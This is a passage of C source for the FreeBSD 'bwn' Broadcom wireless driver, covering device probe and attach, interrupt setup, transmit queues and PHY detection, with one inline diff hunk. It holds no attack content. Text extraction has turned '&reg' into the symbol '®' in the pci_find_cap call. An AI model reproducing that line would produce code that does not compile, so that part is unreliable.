0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, }; static const uint16_t bwn_tab_noise_g1[] = BWN_TAB_NOISE_G1; static const uint16_t bwn_tab_noise_g2[] = BWN_TAB_NOISE_G2; static const uint16_t bwn_tab_noisescale_g1[] = BWN_TAB_NOISESCALE_G1; static const uint16_t bwn_tab_noisescale_g2[] = BWN_TAB_NOISESCALE_G2; static const uint16_t bwn_tab_noisescale_g3[] = BWN_TAB_NOISESCALE_G3; const uint8_t bwn_bitrev_table[256] = BWN_BITREV_TABLE; #define VENDOR_LED_ACT(vendor) \ { \ .vid = PCI_VENDOR_##vendor, \ .led_act = { BWN_VENDOR_LED_ACT_##vendor } \ } static const struct { uint16_t vid; uint8_t led_act[BWN_LED_MAX]; } bwn_vendor_led_act[] = { VENDOR_LED_ACT(COMPAQ), VENDOR_LED_ACT(ASUSTEK) }; static const uint8_t bwn_default_led_act[BWN_LED_MAX] = { BWN_VENDOR_LED_ACT_DEFAULT }; #undef VENDOR_LED_ACT static const struct { int on_dur; int off_dur; } bwn_led_duration[109] = { [0] = { 400, 100 }, [2] = { 150, 75 }, [4] = { 90, 45 }, [11] = { 66, 34 }, [12] = { 53, 26 }, [18] = { 42, 21 }, [22] = { 35, 17 }, [24] = { 32, 16 }, [36] = { 21, 10 }, [48] = { 16, 8 }, [72] = { 11, 5 }, [96] = { 9, 4 }, [108] = { 7, 3 } }; static const uint16_t bwn_wme_shm_offsets[] = { [0] = BWN_WME_BESTEFFORT, [1] = BWN_WME_BACKGROUND, [2] = BWN_WME_VOICE, [3] = BWN_WME_VIDEO, }; static const struct siba_devid bwn_devs[] = { SIBA_DEV(BROADCOM, 80211, 5, "Revision 5"), SIBA_DEV(BROADCOM, 80211, 6, "Revision 6"), SIBA_DEV(BROADCOM, 80211, 7, "Revision 7"), SIBA_DEV(BROADCOM, 80211, 9, "Revision 9"), SIBA_DEV(BROADCOM, 80211, 10, "Revision 10"), SIBA_DEV(BROADCOM, 80211, 11, "Revision 11"), SIBA_DEV(BROADCOM, 80211, 13, "Revision 13"), SIBA_DEV(BROADCOM, 80211, 15, "Revision 15"), SIBA_DEV(BROADCOM, 80211, 16, "Revision 16") }; static int bwn_probe(device_t dev) { int i; for (i = 0; i < sizeof(bwn_devs) / sizeof(bwn_devs[0]); i++) { if (siba_get_vendor(dev) == bwn_devs[i].sd_vendor && siba_get_device(dev) == bwn_devs[i].sd_device && siba_get_revid(dev) == bwn_devs[i].sd_rev) return (BUS_PROBE_DEFAULT); } return (ENXIO); } static int bwn_attach(device_t dev) { struct bwn_mac *mac; struct bwn_softc *sc = device_get_softc(dev); int error, i, msic, reg; sc->sc_dev = dev; #ifdef BWN_DEBUG sc->sc_debug = bwn_debug; #endif if ((sc->sc_flags & BWN_FLAG_ATTACHED) == 0) { error = bwn_attach_pre(sc); if (error != 0) return (error); bwn_sprom_bugfixes(dev); sc->sc_flags |= BWN_FLAG_ATTACHED; } if (!TAILQ_EMPTY(&sc->sc_maclist)) { if (siba_get_pci_device(dev) != 0x4313 && siba_get_pci_device(dev) != 0x431a && siba_get_pci_device(dev) != 0x4321) { device_printf(sc->sc_dev, "skip 802.11 cores\n"); return (ENODEV); } } mac = (struct bwn_mac *)malloc(sizeof(*mac), M_DEVBUF, M_NOWAIT | M_ZERO); if (mac == NULL) return (ENOMEM); mac->mac_sc = sc; mac->mac_status = BWN_MAC_STATUS_UNINIT; if (bwn_bfp != 0) mac->mac_flags |= BWN_MAC_FLAG_BADFRAME_PREEMP; TASK_INIT(&mac->mac_hwreset, 0, bwn_hwreset, mac); TASK_INIT(&mac->mac_intrtask, 0, bwn_intrtask, mac); TASK_INIT(&mac->mac_txpower, 0, bwn_txpwr, mac); error = bwn_attach_core(mac); if (error) goto fail0; bwn_led_attach(mac); device_printf(sc->sc_dev, "WLAN (chipid %#x rev %u) " "PHY (analog %d type %d rev %d) RADIO (manuf %#x ver %#x rev %d)\n", siba_get_chipid(sc->sc_dev), siba_get_revid(sc->sc_dev), mac->mac_phy.analog, mac->mac_phy.type, mac->mac_phy.rev, mac->mac_phy.rf_manuf, mac->mac_phy.rf_ver, mac->mac_phy.rf_rev); if (mac->mac_flags & BWN_MAC_FLAG_DMA) device_printf(sc->sc_dev, "DMA (%d bits)\n", mac->mac_method.dma.dmatype); else device_printf(sc->sc_dev, "PIO\n"); /* * setup PCI resources and interrupt. */ if (pci_find_cap(dev, PCIY_EXPRESS, ®) == 0) { msic = pci_msi_count(dev); if (bootverbose) device_printf(sc->sc_dev, "MSI count : %d\n", msic); } else msic = 0; mac->mac_intr_spec = bwn_res_spec_legacy; if (msic == BWN_MSI_MESSAGES && bwn_msi_disable == 0) { if (pci_alloc_msi(dev, &msic) == 0) { device_printf(sc->sc_dev, "Using %d MSI messages\n", msic); mac->mac_intr_spec = bwn_res_spec_msi; mac->mac_msi = 1; } } error = bus_alloc_resources(dev, mac->mac_intr_spec, mac->mac_res_irq); if (error) { device_printf(sc->sc_dev, "couldn't allocate IRQ resources (%d)\n", error); goto fail1; } if (mac->mac_msi == 0) error = bus_setup_intr(dev, mac->mac_res_irq[0], INTR_TYPE_NET | INTR_MPSAFE, bwn_intr, NULL, mac, &mac->mac_intrhand[0]); else { for (i = 0; i < BWN_MSI_MESSAGES; i++) { error = bus_setup_intr(dev, mac->mac_res_irq[i], INTR_TYPE_NET | INTR_MPSAFE, bwn_intr, NULL, mac, &mac->mac_intrhand[i]); if (error != 0) { device_printf(sc->sc_dev, "couldn't setup interrupt (%d)\n", error); break; } } } TAILQ_INSERT_TAIL(&sc->sc_maclist, mac, mac_list); /* * calls attach-post routine */ if ((sc->sc_flags & BWN_FLAG_ATTACHED) != 0) bwn_attach_post(sc); return (0); fail1: if (msic == BWN_MSI_MESSAGES && bwn_msi_disable == 0) pci_release_msi(dev); fail0: free(mac, M_DEVBUF); return (error); } static int bwn_is_valid_ether_addr(uint8_t *addr) { char zero_addr[6] = { 0, 0, 0, 0, 0, 0 }; if ((addr[0] & 1) || (!bcmp(addr, zero_addr, ETHER_ADDR_LEN))) return (FALSE); return (TRUE); } static int bwn_attach_post(struct bwn_softc *sc) { struct ieee80211com *ic; struct ifnet *ifp = sc->sc_ifp; ic = ifp->if_l2com; ic->ic_ifp = ifp; /* XXX not right but it's not used anywhere important */ ic->ic_phytype = IEEE80211_T_OFDM; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WME /* WME/WMM supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_TXPMGT /* capable of txpow mgt */ ; ic->ic_flags_ext |= IEEE80211_FEXT_SWBMISS; /* s/w bmiss */ /* call MI attach routine. */ ieee80211_ifattach(ic, bwn_is_valid_ether_addr(siba_sprom_get_mac_80211a(sc->sc_dev)) ? siba_sprom_get_mac_80211a(sc->sc_dev) : siba_sprom_get_mac_80211bg(sc->sc_dev)); ic->ic_headroom = sizeof(struct bwn_txhdr); /* override default methods */ ic->ic_raw_xmit = bwn_raw_xmit; ic->ic_updateslot = bwn_updateslot; ic->ic_update_promisc = bwn_update_promisc; ic->ic_wme.wme_update = bwn_wme_update; ic->ic_scan_start = bwn_scan_start; ic->ic_scan_end = bwn_scan_end; ic->ic_set_channel = bwn_set_channel; ic->ic_vap_create = bwn_vap_create; ic->ic_vap_delete = bwn_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), BWN_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), BWN_RX_RADIOTAP_PRESENT); bwn_sysctl_node(sc); if (bootverbose) ieee80211_announce(ic); return (0); } static void bwn_phy_detach(struct bwn_mac *mac) { if (mac->mac_phy.detach != NULL) mac->mac_phy.detach(mac); } static int bwn_detach(device_t dev) { struct bwn_softc *sc = device_get_softc(dev); struct bwn_mac *mac = sc->sc_curmac; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int i; sc->sc_flags |= BWN_FLAG_INVALID; if (device_is_attached(sc->sc_dev)) { bwn_stop(sc, 1); bwn_dma_free(mac); callout_drain(&sc->sc_led_blink_ch); callout_drain(&sc->sc_rfswitch_ch); callout_drain(&sc->sc_task_ch); callout_drain(&sc->sc_watchdog_ch); bwn_phy_detach(mac); if (ifp != NULL) { ieee80211_draintask(ic, &mac->mac_hwreset); ieee80211_draintask(ic, &mac->mac_txpower); ieee80211_ifdetach(ic); if_free(ifp); } } taskqueue_drain(sc->sc_tq, &mac->mac_intrtask); taskqueue_free(sc->sc_tq); for (i = 0; i < BWN_MSI_MESSAGES; i++) { if (mac->mac_intrhand[i] != NULL) { bus_teardown_intr(dev, mac->mac_res_irq[i], mac->mac_intrhand[i]); mac->mac_intrhand[i] = NULL; } } bus_release_resources(dev, mac->mac_intr_spec, mac->mac_res_irq); if (mac->mac_msi != 0) pci_release_msi(dev); BWN_LOCK_DESTROY(sc); return (0); } static int bwn_attach_pre(struct bwn_softc *sc) { struct ifnet *ifp; int error = 0; BWN_LOCK_INIT(sc); TAILQ_INIT(&sc->sc_maclist); callout_init_mtx(&sc->sc_rfswitch_ch, &sc->sc_mtx, 0); callout_init_mtx(&sc->sc_task_ch, &sc->sc_mtx, 0); callout_init_mtx(&sc->sc_watchdog_ch, &sc->sc_mtx, 0); sc->sc_tq = taskqueue_create_fast("bwn_taskq", M_NOWAIT, taskqueue_thread_enqueue, &sc->sc_tq); taskqueue_start_threads(&sc->sc_tq, 1, PI_NET, "%s taskq", device_get_nameunit(sc->sc_dev)); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); error = ENOSPC; goto fail; } /* set these up early for if_printf use */ if_initname(ifp, device_get_name(sc->sc_dev), device_get_unit(sc->sc_dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = bwn_init; ifp->if_ioctl = bwn_ioctl; ifp->if_start = bwn_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); return (0); fail: BWN_LOCK_DESTROY(sc); return (error); } static void bwn_sprom_bugfixes(device_t dev) { #define BWN_ISDEV(_vendor, _device, _subvendor, _subdevice) \ ((siba_get_pci_vendor(dev) == PCI_VENDOR_##_vendor) && \ (siba_get_pci_device(dev) == _device) && \ (siba_get_pci_subvendor(dev) == PCI_VENDOR_##_subvendor) && \ (siba_get_pci_subdevice(dev) == _subdevice)) if (siba_get_pci_subvendor(dev) == PCI_VENDOR_APPLE && siba_get_pci_subdevice(dev) == 0x4e && siba_get_pci_revid(dev) > 0x40) siba_sprom_set_bf_lo(dev, siba_sprom_get_bf_lo(dev) | BWN_BFL_PACTRL); if (siba_get_pci_subvendor(dev) == SIBA_BOARDVENDOR_DELL && siba_get_chipid(dev) == 0x4301 && siba_get_pci_revid(dev) == 0x74) siba_sprom_set_bf_lo(dev, siba_sprom_get_bf_lo(dev) | BWN_BFL_BTCOEXIST); if (siba_get_type(dev) == SIBA_TYPE_PCI) { if (BWN_ISDEV(BROADCOM, 0x4318, ASUSTEK, 0x100f) || BWN_ISDEV(BROADCOM, 0x4320, DELL, 0x0003) || BWN_ISDEV(BROADCOM, 0x4320, HP, 0x12f8) || BWN_ISDEV(BROADCOM, 0x4320, LINKSYS, 0x0013) || BWN_ISDEV(BROADCOM, 0x4320, LINKSYS, 0x0014) || BWN_ISDEV(BROADCOM, 0x4320, LINKSYS, 0x0015) || BWN_ISDEV(BROADCOM, 0x4320, MOTOROLA, 0x7010)) siba_sprom_set_bf_lo(dev, siba_sprom_get_bf_lo(dev) & ~BWN_BFL_BTCOEXIST); } #undef BWN_ISDEV } static int bwn_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define IS_RUNNING(ifp) \ ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)) struct bwn_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *)data; int error = 0, startall; switch (cmd) { case SIOCSIFFLAGS: startall = 0; if (IS_RUNNING(ifp)) { bwn_update_promisc(ifp); } else if (ifp->if_flags & IFF_UP) { if ((sc->sc_flags & BWN_FLAG_INVALID) == 0) { bwn_init(sc); startall = 1; } } else bwn_stop(sc, 1); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void bwn_start(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; BWN_LOCK(sc); bwn_start_locked(ifp); BWN_UNLOCK(sc); } static void bwn_start_locked(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct ieee80211_key *k; struct mbuf *m; BWN_ASSERT_LOCKED(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || mac == NULL || mac->mac_status < BWN_MAC_STATUS_STARTED) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); /* XXX: LOCK */ if (m == NULL) break; if (bwn_tx_isfull(sc, m)) break; ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (ni == NULL) { device_printf(sc->sc_dev, "unexpected NULL ni\n"); m_freem(m); ifp->if_oerrors++; continue; } KASSERT(ni != NULL, ("%s:%d: fail", __func__, __LINE__)); wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m); if (k == NULL) { ieee80211_free_node(ni); m_freem(m); ifp->if_oerrors++; continue; } } wh = NULL; /* Catch any invalid use */ if (bwn_tx_start(sc, ni, m) != 0) { if (ni != NULL) ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_watchdog_timer = 5; } } static int bwn_tx_isfull(struct bwn_softc *sc, struct mbuf *m) { struct bwn_dma_ring *dr; struct bwn_mac *mac = sc->sc_curmac; struct bwn_pio_txqueue *tq; struct ifnet *ifp = sc->sc_ifp; int pktlen = roundup(m->m_pkthdr.len + BWN_HDRSIZE(mac), 4); BWN_ASSERT_LOCKED(sc); if (mac->mac_flags & BWN_MAC_FLAG_DMA) { dr = bwn_dma_select(mac, M_WME_GETAC(m)); if (dr->dr_stop == 1 || bwn_dma_freeslot(dr) < BWN_TX_SLOTS_PER_FRAME) { dr->dr_stop = 1; goto full; } } else { tq = bwn_pio_select(mac, M_WME_GETAC(m)); if (tq->tq_free == 0 || pktlen > tq->tq_size || pktlen > (tq->tq_size - tq->tq_used)) { tq->tq_stop = 1; goto full; } } return (0); full: IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (1); } static int bwn_tx_start(struct bwn_softc *sc, struct ieee80211_node *ni, struct mbuf *m) { struct bwn_mac *mac = sc->sc_curmac; int error; BWN_ASSERT_LOCKED(sc); if (m->m_pkthdr.len < IEEE80211_MIN_LEN || mac == NULL) { m_freem(m); return (ENXIO); } error = (mac->mac_flags & BWN_MAC_FLAG_DMA) ? bwn_dma_tx_start(mac, ni, m) : bwn_pio_tx_start(mac, ni, m); if (error) { m_freem(m); return (error); } return (0); } static int bwn_pio_tx_start(struct bwn_mac *mac, struct ieee80211_node *ni, struct mbuf *m) { struct bwn_pio_txpkt *tp; struct bwn_pio_txqueue *tq = bwn_pio_select(mac, M_WME_GETAC(m)); struct bwn_softc *sc = mac->mac_sc; struct bwn_txhdr txhdr; struct mbuf *m_new; uint32_t ctl32; int error; uint16_t ctl16; BWN_ASSERT_LOCKED(sc); /* XXX TODO send packets after DTIM */ KASSERT(!TAILQ_EMPTY(&tq->tq_pktlist), ("%s: fail", __func__)); tp = TAILQ_FIRST(&tq->tq_pktlist); tp->tp_ni = ni; tp->tp_m = m; error = bwn_set_txhdr(mac, ni, m, &txhdr, BWN_PIO_COOKIE(tq, tp)); if (error) { device_printf(sc->sc_dev, "tx fail\n"); return (error); } TAILQ_REMOVE(&tq->tq_pktlist, tp, tp_list); tq->tq_used += roundup(m->m_pkthdr.len + BWN_HDRSIZE(mac), 4); tq->tq_free--; if (siba_get_revid(sc->sc_dev) >= 8) { /* * XXX please removes m_defrag(9) */ m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { device_printf(sc->sc_dev, "%s: can't defrag TX buffer\n", __func__); return (ENOBUFS); } if (m_new->m_next != NULL) device_printf(sc->sc_dev, "TODO: fragmented packets for PIO\n"); tp->tp_m = m_new; /* send HEADER */ ctl32 = bwn_pio_write_multi_4(mac, tq, (BWN_PIO_READ_4(mac, tq, BWN_PIO8_TXCTL) | BWN_PIO8_TXCTL_FRAMEREADY) & ~BWN_PIO8_TXCTL_EOF, (const uint8_t *)&txhdr, BWN_HDRSIZE(mac)); /* send BODY */ ctl32 = bwn_pio_write_multi_4(mac, tq, ctl32, mtod(m_new, const void *), m_new->m_pkthdr.len); bwn_pio_write_4(mac, tq, BWN_PIO_TXCTL, ctl32 | BWN_PIO8_TXCTL_EOF); } else { ctl16 = bwn_pio_write_multi_2(mac, tq, (bwn_pio_read_2(mac, tq, BWN_PIO_TXCTL) | BWN_PIO_TXCTL_FRAMEREADY) & ~BWN_PIO_TXCTL_EOF, (const uint8_t *)&txhdr, BWN_HDRSIZE(mac)); ctl16 = bwn_pio_write_mbuf_2(mac, tq, ctl16, m); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl16 | BWN_PIO_TXCTL_EOF); } return (0); } static struct bwn_pio_txqueue * bwn_pio_select(struct bwn_mac *mac, uint8_t prio) { if ((mac->mac_flags & BWN_MAC_FLAG_WME) == 0) return (&mac->mac_method.pio.wme[WME_AC_BE]); switch (prio) { case 0: return (&mac->mac_method.pio.wme[WME_AC_BE]); case 1: return (&mac->mac_method.pio.wme[WME_AC_BK]); case 2: return (&mac->mac_method.pio.wme[WME_AC_VI]); case 3: return (&mac->mac_method.pio.wme[WME_AC_VO]); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (NULL); } static int bwn_dma_tx_start(struct bwn_mac *mac, struct ieee80211_node *ni, struct mbuf *m) { #define BWN_GET_TXHDRCACHE(slot) \ &(txhdr_cache[(slot / BWN_TX_SLOTS_PER_FRAME) * BWN_HDRSIZE(mac)]) struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dma_ring *dr = bwn_dma_select(mac, M_WME_GETAC(m)); struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *mt; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; uint8_t *txhdr_cache = (uint8_t *)dr->dr_txhdr_cache; int error, slot, backup[2] = { dr->dr_curslot, dr->dr_usedslot }; BWN_ASSERT_LOCKED(sc); KASSERT(!dr->dr_stop, ("%s:%d: fail", __func__, __LINE__)); /* XXX send after DTIM */ slot = bwn_dma_getslot(dr); dr->getdesc(dr, slot, &desc, &mt); KASSERT(mt->mt_txtype == BWN_DMADESC_METATYPE_HEADER, ("%s:%d: fail", __func__, __LINE__)); error = bwn_set_txhdr(dr->dr_mac, ni, m, (struct bwn_txhdr *)BWN_GET_TXHDRCACHE(slot), BWN_DMA_COOKIE(dr, slot)); if (error) goto fail; error = bus_dmamap_load(dr->dr_txring_dtag, mt->mt_dmap, BWN_GET_TXHDRCACHE(slot), BWN_HDRSIZE(mac), bwn_dma_ring_addr, &mt->mt_paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto fail; } bus_dmamap_sync(dr->dr_txring_dtag, mt->mt_dmap, BUS_DMASYNC_PREWRITE); dr->setdesc(dr, desc, mt->mt_paddr, BWN_HDRSIZE(mac), 1, 0, 0); bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); slot = bwn_dma_getslot(dr); dr->getdesc(dr, slot, &desc, &mt); KASSERT(mt->mt_txtype == BWN_DMADESC_METATYPE_BODY && mt->mt_islast == 1, ("%s:%d: fail", __func__, __LINE__)); mt->mt_m = m; mt->mt_ni = ni; error = bus_dmamap_load_mbuf(dma->txbuf_dtag, mt->mt_dmap, m, bwn_dma_buf_addr, &mt->mt_paddr, BUS_DMA_NOWAIT); if (error && error != EFBIG) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto fail; } if (error) { /* error == EFBIG */ struct mbuf *m_new; m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { if_printf(ifp, "%s: can't defrag TX buffer\n", __func__); error = ENOBUFS; goto fail; } else { m = m_new; } mt->mt_m = m; error = bus_dmamap_load_mbuf(dma->txbuf_dtag, mt->mt_dmap, m, bwn_dma_buf_addr, &mt->mt_paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (2) %d\n", __func__, error); goto fail; } } bus_dmamap_sync(dma->txbuf_dtag, mt->mt_dmap, BUS_DMASYNC_PREWRITE); dr->setdesc(dr, desc, mt->mt_paddr, m->m_pkthdr.len, 0, 1, 1); bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); /* XXX send after DTIM */ dr->start_transfer(dr, bwn_dma_nextslot(dr, slot)); return (0); fail: dr->dr_curslot = backup[0]; dr->dr_usedslot = backup[1]; return (error); #undef BWN_GET_TXHDRCACHE } static void bwn_watchdog(void *arg) { struct bwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_watchdog_timer != 0 && --sc->sc_watchdog_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; } callout_schedule(&sc->sc_watchdog_ch, hz); } static int bwn_attach_core(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int error, have_bg = 0, have_a = 0; uint32_t high; KASSERT(siba_get_revid(sc->sc_dev) >= 5, ("unsupported revision %d", siba_get_revid(sc->sc_dev))); siba_powerup(sc->sc_dev, 0); high = siba_read_4(sc->sc_dev, SIBA_TGSHIGH); bwn_reset_core(mac, (high & BWN_TGSHIGH_HAVE_2GHZ) ? BWN_TGSLOW_SUPPORT_G : 0); error = bwn_phy_getinfo(mac, high); if (error) goto fail; have_a = (high & BWN_TGSHIGH_HAVE_5GHZ) ? 1 : 0; have_bg = (high & BWN_TGSHIGH_HAVE_2GHZ) ? 1 : 0; if (siba_get_pci_device(sc->sc_dev) != 0x4312 && siba_get_pci_device(sc->sc_dev) != 0x4319 && siba_get_pci_device(sc->sc_dev) != 0x4324) { have_a = have_bg = 0; if (mac->mac_phy.type == BWN_PHYTYPE_A) have_a = 1; else if (mac->mac_phy.type == BWN_PHYTYPE_G || mac->mac_phy.type == BWN_PHYTYPE_N || mac->mac_phy.type == BWN_PHYTYPE_LP) have_bg = 1; else KASSERT(0 == 1, ("%s: unknown phy type (%d)", __func__, mac->mac_phy.type)); } /* XXX turns off PHY A because it's not supported */ if (mac->mac_phy.type != BWN_PHYTYPE_LP && mac->mac_phy.type != BWN_PHYTYPE_N) { have_a = 0; have_bg = 1; } if (mac->mac_phy.type == BWN_PHYTYPE_G) { mac->mac_phy.attach = bwn_phy_g_attach; mac->mac_phy.detach = bwn_phy_g_detach; mac->mac_phy.prepare_hw = bwn_phy_g_prepare_hw; mac->mac_phy.init_pre = bwn_phy_g_init_pre; mac->mac_phy.init = bwn_phy_g_init; mac->mac_phy.exit = bwn_phy_g_exit; mac->mac_phy.phy_read = bwn_phy_g_read; mac->mac_phy.phy_write = bwn_phy_g_write; mac->mac_phy.rf_read = bwn_phy_g_rf_read; mac->mac_phy.rf_write = bwn_phy_g_rf_write; mac->mac_phy.use_hwpctl = bwn_phy_g_hwpctl; mac->mac_phy.rf_onoff = bwn_phy_g_rf_onoff; mac->mac_phy.switch_analog = bwn_phy_switch_analog; mac->mac_phy.switch_channel = bwn_phy_g_switch_channel; mac->mac_phy.get_default_chan = bwn_phy_g_get_default_chan; mac->mac_phy.set_antenna = bwn_phy_g_set_antenna; mac->mac_phy.set_im = bwn_phy_g_im; mac->mac_phy.recalc_txpwr = bwn_phy_g_recalc_txpwr; mac->mac_phy.set_txpwr = bwn_phy_g_set_txpwr; mac->mac_phy.task_15s = bwn_phy_g_task_15s; mac->mac_phy.task_60s = bwn_phy_g_task_60s; } else if (mac->mac_phy.type == BWN_PHYTYPE_LP) { mac->mac_phy.init_pre = bwn_phy_lp_init_pre; mac->mac_phy.init = bwn_phy_lp_init; mac->mac_phy.phy_read = bwn_phy_lp_read; mac->mac_phy.phy_write = bwn_phy_lp_write; mac->mac_phy.phy_maskset = bwn_phy_lp_maskset; mac->mac_phy.rf_read = bwn_phy_lp_rf_read; mac->mac_phy.rf_write = bwn_phy_lp_rf_write; mac->mac_phy.rf_onoff = bwn_phy_lp_rf_onoff; mac->mac_phy.switch_analog = bwn_phy_lp_switch_analog; mac->mac_phy.switch_channel = bwn_phy_lp_switch_channel; mac->mac_phy.get_default_chan = bwn_phy_lp_get_default_chan; mac->mac_phy.set_antenna = bwn_phy_lp_set_antenna; mac->mac_phy.task_60s = bwn_phy_lp_task_60s; } else { device_printf(sc->sc_dev, "unsupported PHY type (%d)\n", mac->mac_phy.type); error = ENXIO; goto fail; } mac->mac_phy.gmode = have_bg; if (mac->mac_phy.attach != NULL) { error = mac->mac_phy.attach(mac); if (error) { device_printf(sc->sc_dev, "failed\n"); goto fail; } } bwn_reset_core(mac, have_bg ? BWN_TGSLOW_SUPPORT_G : 0); error = bwn_chiptest(mac); if (error) goto fail; error = bwn_setup_channels(mac, have_bg, have_a); if (error) { device_printf(sc->sc_dev, "failed to setup channels\n"); goto fail; } if (sc->sc_curmac == NULL) sc->sc_curmac = mac; error = bwn_dma_attach(mac); if (error != 0) { device_printf(sc->sc_dev, "failed to initialize DMA\n"); goto fail; } mac->mac_phy.switch_analog(mac, 0); siba_dev_down(sc->sc_dev, 0); fail: siba_powerdown(sc->sc_dev); return (error); } static void bwn_reset_core(struct bwn_mac *mac, uint32_t flags) { struct bwn_softc *sc = mac->mac_sc; uint32_t low, ctl; flags |= (BWN_TGSLOW_PHYCLOCK_ENABLE | BWN_TGSLOW_PHYRESET); siba_dev_up(sc->sc_dev, flags); DELAY(2000); low = (siba_read_4(sc->sc_dev, SIBA_TGSLOW) | SIBA_TGSLOW_FGC) & ~BWN_TGSLOW_PHYRESET; siba_write_4(sc->sc_dev, SIBA_TGSLOW, low); siba_read_4(sc->sc_dev, SIBA_TGSLOW); DELAY(1000); siba_write_4(sc->sc_dev, SIBA_TGSLOW, low & ~SIBA_TGSLOW_FGC); siba_read_4(sc->sc_dev, SIBA_TGSLOW); DELAY(1000); if (mac->mac_phy.switch_analog != NULL) mac->mac_phy.switch_analog(mac, 1); ctl = BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_GMODE; if (flags & BWN_TGSLOW_SUPPORT_G) ctl |= BWN_MACCTL_GMODE; BWN_WRITE_4(mac, BWN_MACCTL, ctl | BWN_MACCTL_IHR_ON); } static int bwn_phy_getinfo(struct bwn_mac *mac, int tgshigh) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; uint32_t tmp; /* PHY */ tmp = BWN_READ_2(mac, BWN_PHYVER); phy->gmode = (tgshigh & BWN_TGSHIGH_HAVE_2GHZ) ? 1 : 0; phy->rf_on = 1; phy->analog = (tmp & BWN_PHYVER_ANALOG) >> 12; phy->type = (tmp & BWN_PHYVER_TYPE) >> 8; phy->rev = (tmp & BWN_PHYVER_VERSION); if ((phy->type == BWN_PHYTYPE_A && phy->rev >= 4) || (phy->type == BWN_PHYTYPE_B && phy->rev != 2 && phy->rev != 4 && phy->rev != 6 && phy->rev != 7) || (phy->type == BWN_PHYTYPE_G && phy->rev > 9) || (phy->type == BWN_PHYTYPE_N && phy->rev > 4) || (phy->type == BWN_PHYTYPE_LP && phy->rev > 2)) goto unsupphy; /* RADIO */ if (siba_get_chipid(sc->sc_dev) == 0x4317) { if (siba_get_chiprev(sc->sc_dev) == 0) tmp = 0x3205017f; else if (siba_get_chiprev(sc->sc_dev) == 1) tmp = 0x4205017f; else tmp = 0x5205017f; } else { BWN_WRITE_2(mac, BWN_RFCTL, BWN_RFCTL_ID); tmp = BWN_READ_2(mac, BWN_RFDATALO); BWN_WRITE_2(mac, BWN_RFCTL, BWN_RFCTL_ID); tmp |= (uint32_t)BWN_READ_2(mac, BWN_RFDATAHI) << 16; } phy->rf_rev = (tmp & 0xf0000000) >> 28; phy->rf_ver = (tmp & 0x0ffff000) >> 12; phy->rf_manuf = (tmp & 0x00000fff); if (phy->rf_manuf != 0x17f) /* 0x17f is broadcom */ goto unsupradio; if ((phy->type == BWN_PHYTYPE_A && (phy->rf_ver != 0x2060 || phy->rf_rev != 